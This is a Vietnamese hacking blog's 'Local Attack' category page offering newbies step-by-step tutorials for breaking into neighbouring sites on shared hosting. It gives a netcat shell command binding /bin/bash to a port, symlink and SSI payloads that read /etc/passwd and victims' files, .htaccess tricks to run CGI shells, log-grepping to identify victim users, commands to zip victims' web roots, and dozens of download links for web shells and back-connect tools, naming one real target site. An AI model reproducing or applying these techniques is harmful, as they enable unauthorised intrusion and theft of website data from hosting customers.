Hiển thị các bài đăng có nhãn Local Attack. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Local Attack. Hiển thị tất cả bài đăng
Thứ Năm, 29 tháng 8, 2013
Có User + Pass Data trong tay ? Nhưng bạn chưa làm được gì ????
Đọc Thêm
Chuyên Mục:
Local Attack,
Shell,
TUTORIALS
Thứ Hai, 26 tháng 8, 2013
Sym root bypass open port nếu server cho chạy python
dùng lệnh python -h xem có trả về kết quả gì ko nè.
Đọc Thêm
Hướng dẫn tổng hợp, chi tiết cơ bản nhất các bước để local một victim.
Đọc Thêm
Chuyên Mục:
Local Attack
Tổng hợp những lệnh trên shell hay dùng nhất khi local
Code:
directadmin: cat /etc/virtual/domainowners cpanel: ls -la /etc/valiases/tendomainvictim.com cd/etc/vdomainaliases;ls-lia
Đọc Thêm
Chuyên Mục:
Local Attack
Thứ Năm, 18 tháng 4, 2013
Upload your shell to joomla websites
Code:
http://www.site.com/administrator/
Đọc Thêm
Chuyên Mục:
Local Attack,
Shell,
TUTORIALS
Thứ Hai, 4 tháng 2, 2013
VIdeo local và up shell by pass
Chuyên Mục:
Local Attack
Thứ Bảy, 1 tháng 12, 2012
[Tutorial]Backconnect with netcat
netcat windows-http://anonym.to/?http://joncraton.o...at-for-windows
nc to upload with shell-http://www.multiupload.nl/TOBD6TAOXE
2.Upload nc with shell
3.set chmod 777 for nc
4.run command ./nc -vv -l -p [port] -e /bin/bash at shell
5.open cmd direct to where nc save like this cd c:\
and run this command nc -vv [ip target] [port]
6.now you have back connect it
Thứ Năm, 22 tháng 11, 2012
[TUT] Local Cơ bản cho newbie
Đọc Thêm
Chuyên Mục:
Local Attack
[TUT]Local id apache
Chuyên Mục:
Local Attack
Thứ Tư, 14 tháng 11, 2012
Symlink sa 3.0
Download:
Mã:
http://www.mediafire.com/?n5spzc6z79512jg
TUT hướng dẫn sử dụng:
Mã:
http://www.mediafire.com/?rqd1m6sgllssi50
Nguồn Google.com
Đọc Thêm
Thứ Bảy, 10 tháng 11, 2012
[Tổng hợp] Shell, NetCut, Symlink, CGI...
Tổng hợp bộ Shell, NetCut, Symlink, CGI... public lên đây cho anh em, đặc biệt là newbie có thêm tools tham khảo để testing.
Download:
http://www.mediafire.com/download.php?jbi4c20wt6haa4w
Pass:
phimhq.net@vnhack.us
Về cách sử dụng thì trong 4rum cũng có rồi, nếu chưa thạo thì Google search hộ cái nhé. Good luck to you!
Đọc Thêm
Thứ Năm, 18 tháng 10, 2012
Chuyển Data Sang 1 Sever khác
Mục đích: Chạy 3 site Ex: Guester, GUG , VG-UG ở 3 host khác nhau và dùng chung data của 1 host nào đó.
Công việc rất đơn giản. Chúng ta chỉ cần cấu hình trên host H cho phép IP của 3 host A, B, C kia được phép kết nối đên MySQL Server của nó.- Đăng nhập vào Cpanel --> Remote MySQL.
Chỉnh như dưới đây:
Sau đó khi khai báo Config Database tại 3 host Guester, GUG, VG-UG kia. Thông số hostname các bạn sẽ thay thế localhost bằng IP của host #.
Nguồn : Sưu tầm
Đọc Thêm
Thứ Tư, 17 tháng 10, 2012
Video Upload Shell VBB
[+] video http://www.4shared.com/rar/c05n5a6_/tmtno1.html
[+] shell : http://www.mediafire.com/?y63833jxjppld7s
Đọc Thêm
Chuyên Mục:
Local Attack
Thứ Ba, 16 tháng 10, 2012
Tổng hợp TUT local căn bản cho NB
http://www.mediafire.com/?pd10l797f5haw
==================================
Một số tut khác
====================================
Up shell vbb mọi phiên bản (hướng dẫn từ a -gt; z)
http://www.mediafire.com/?gbb3xyhpx2iwoat
pass: tranhoai
====================================
Local hostvn
http://www.mediafire.com/?dhpbve4z1b8gio1
=================================
Tut SQL + up shell +local (tổng hợp)
1.Tìm site lỗi SQL và khai thác
2.Login với quyền admin để up shell
3.Local sang các site khác cùng server
http://www.mediafire.com/?xr10n8nczr8du9q
=================================
Local bằng cách up Cgi-Telnet -
http://www.mediafire.com/download.php?djnmntmgacm
=============================================
Local + Upload shell Joomla chi tiết
http://www.mediafire.com/?3hqep6ku7528vub
pasS: 25071989
==================================
Upload Shell PHPMYADMIN
Link : http://www.mediafire.com/?7rvuy2a62b40k23
Pass : BYG
==================================
một số video khác
http://www.mediafire.com/download.php?tgjd4bnnzdy
http://www.mediafire.com/download.php?ee1ztyyj32n
http://www.mediafire.com/download.php?mwizmitjmmo
http://www.mediafire.com/download.php?iynzjmjjn4y
http://www.mediafire.com/download.php?zjzvenhd1ma
http://www.mediafire.com/download.php?lmq5jlhjxok
http://www.mediafire.com/download.php?jinkzmwmmzy
http://www.mediafire.com/download.php?oimmn2yjnj0
http://www.mediafire.com/download.php?xbonumjzyqz
pass : bocapit
================================================
Local basic
http://www.mediafire.com/?jiki40gwjzx
===========================
Local via sql
http://www.mediafire.com/?w2moq5ygwzy
============================
Tut hướng dẫn chi tiết local thay pass MD5 cho NB
http://www.mediafire.com/?kt4qtkqvma6xusj
=============================
local
http://www.mediafire.com/?lnx6ph8978ljt92
===============================
Vài con shell cần thiết khi local cho anh em!
Shell Cgi (cgi.x-zone) khi gỏ command nó sẽ mã hóa dòng lệnh ,có thể qua mặt vài server
http://www.mediafire.com/?45fsa46y5bdobfa
Telnet 1.3
http://www.mediafire.com/?eayxc5k8utpqeig
.htaccess
Options +FollowSymLinks +Indexes
DirectoryIndex default.html
## START ##
Options +ExecCGI
AddHandler cgi-script cgi pl tg love h4 tgb cbg
RewriteEngine on
RewriteRule (.*)\.war$ $1.cgi
## END ##
RemoveHandler .vkl
AddType application/octet-stream .vkl
~gt; 2 dòng cuối khi symljnk ghi vào file.vkl thì file này load trên trình duyệt sẽ tự download về
Admin Finder (tìm thư mục admin)
http://www.mediafire.com/?skaysiedncckx4k
cmd.shtml gt; view source cmd.shtml
lt;!--#exec cmd=quot;dir /home/victim/public_html/quot; --gt;
cmd.shtml (1.txt là file đã được symljnk) gt; view source cmd.shtml
lt;!--#include virtual='1.txt'--gt;
Bypass ln.zip
lt;?php
chmod('ln',0777);
system('./ln -s /etc/passwd gt; 1.txt');
?gt;
hoặc
./ln -s /home/victim/public_html/index.php 1.txt
File SymLink.php
/home/victim/public_html/index.php
Find Path qua error-log : http://victim.com/fuck
tail -100 /var/log/httpd/domains/siteA.error.log | grep fuck
tail -100 /usr/local/apache/logs/error_log | grep fuck
Shell offline.php?acc ~gt; get user admin ,nhiều chức năng ,ko bị lổi trên các server config kỉ
http://www.mediafire.com/?r19m52itzq71x5z
Backuper.php (Leech code)
http://www.mediafire.com/?kp1p40fnwc2171k
Shell Unkonw (Brute)
http://www.mediafire.com/?hvxjzrm1tjgbwmp
Shell images (r57)
http://www.mediafire.com/?lh0nslgadbsb5ab
Shell images (Webadmin)
http://www.mediafire.com/?lc6cizbpw5ijoio
Shell Dumper.php (Zip + Restor data)
http://www.mediafire.com/?9ecl9efdk4mw3hm
Shell images aaa.php.jpg - shell upload
http://www.mediafire.com/i/?d61ubhb1qw11dst
Shell help.php (upload file + chmod)
http://www.mediafire.com/?ytwx6mv4ee2266l
Unzip.php (giải nén các file bị zip)
http://www.mediafire.com/?1bhs7jmvly3e1b4
Con shell này tạo ra thêm 2 file để thực hiện zip
Nếu ko tạo đc 2 file này thì chúng ta sẽ tự tạo 2 file đó
http://www.mediafire.com/?ims0mlwa9e3yzl1
telnet v1.3 (ko cần htaccess)
http://www.mediafire.com/?t1uu3cr6h6aag5c
sym-pl.pl (symljnk cgi ko cần htaccess)
http://www.mediafire.com/?o8fm7bmw90882hq
Shell Root ( thực thi các dòng lệnh sẽ show ra trình duyệt - chỉ sd 1 số sv)
http://www.mediafire.com/?f86f88nfesduuyp
Locus Shell (back connect)
http://www.mediafire.com/?0vk8v5m8kzcqgvf
perl shell mr.thien (BackConnect)
http://www.mediafire.com/?qedquldy39ilgn9
Ỏ trên là toàn bộ video mình sưu tầm từ web ,blog, post lên cho NB như mình. mong nhân được cái thank từ các bạn.
Đọc Thêm
Chuyên Mục:
Local Attack
Chủ Nhật, 7 tháng 10, 2012
Tìm user của victim khi local
Đầu tiên và cũng là cách đơn giản nhất ,đọc file /etc/passwd và đoán user dựa trên domain
cat /etc/passwd
nếu bị server chặn lệnh cat ,bạn thử symlink nó
ln -s /etc/passwd list.txt
hoặc nếu hàm readfile chưa bị disable ,bạn cũng có thể tận dụng nó, tạo 1 file php nội dung như sau
<?php
readfile('/etc/passwd');
?>
Sau đó tiến hành đoán ,user thường giống với domain ,đã loại bỏ kí tự “-” trong domain, đôi khi loại bỏ cả số trong domain.
Cách trên là cơ bản ,nếu domain của victim là domain chính của host ,còn trường hợp là addon domain thì bó tay sao ?
Thử tìm trong logs ,ở đây là error_log ,vào domain victim và tạo ra một error trên trang đó (404 chẳng hạn) rồi tiến hành đọc error_log
tail -1000 /usr/local/apache/logs/error_log
vì các file log này dung lượng rất lớn ,đọc toàn bộ là điểu không khả thi ,chúng ta chỉ cần 1000 dòng cuối cùng trong error_log này ,nó sẽ log cái error mà ta vừa tạo ra trên domain của victim.
Path log trên là khi host dùng cpanel ,đối với directadmin ta có thể tìm được ở /var/log/directadmin/error.log
Trường hợp domain victim dùng mod_rewrite ,tất cả các truy vấn đều hợp lệ thì error_log sẽ không được tạo ra ,thì ta sẽ tiếp tục đọc access_log ,sử dụng lệnh grep để tìm đúng domain mình cần.
grep -i ‘domain.com’ /usr/local/apache/logs/access_log
hoặc lệnh egrep để tìm nhiều domain cùng lúc
egrep -w ‘domain1|domain2|domain3′ /usr/local/apache/logs/access_log
Cuối cùng, cũng là cách mang tính hên xui rất cao nhưng không phải là không được đó là tìm trên google ,search với từ khóa
1
site:domain.com "warning"
và như thế ,bất kì lỗi nào trên website domain.com bị google index đều hiện ra ,và biết đâu trong đó có path của file lỗi ,và thế là ta tìm được user của victim.
Nguồn :Sưu tầm Đọc Thêm
Chuyên Mục:
Local Attack
Chủ Nhật, 23 tháng 9, 2012
Lệnh zip code trên shell
Command
zip -r -9 file_name.zip [path]
vd: zip -r -9 kechocgianvn.zip /home/user/public_html
=> web nó có cái gì thì zip nguyên cả đám. mình thường xài lệnh này
Tar
tar -cvf file_name.tar [path]
Gz
tar -zcvf file_name.tar.gz [path]
Trong đó [path] là đường dẫn tới user hoặc folder nhé Đọc Thêm
Chuyên Mục:
Local Attack
Thứ Sáu, 21 tháng 9, 2012
Local bypass ip/~user
Chuyên Mục:
Local Attack
[Video TUT] Up Shell Win Via Bug DNN - Cubi11
Chuyên Mục:
Local Attack
Hướng đẫn cách lọc USer /etc/passwd
open FILE,"etc.txt"; @user=<FILE>; close(FILE); open FILE,">>kid-BYG.txt"; foreach (@user){ $_=~/(.*):x:/; print FILE $1."\n"; } close(FILE);Save đoạn code trên kid.pl Tạo 1 file etc.txt copy những gì lấy dc từ etc/passwd bỏ vào . Sau đó run : perl kid.pl . sẽ tạo ra 1 file kid-BYG.txt trong đó có danh sách user Đọc Thêm
Chuyên Mục:
Local Attack
[Tut] Local + up shell lên xsktangiang.com.vn
Chuyên Mục:
Local Attack
Đăng ký:
Bài đăng (Atom)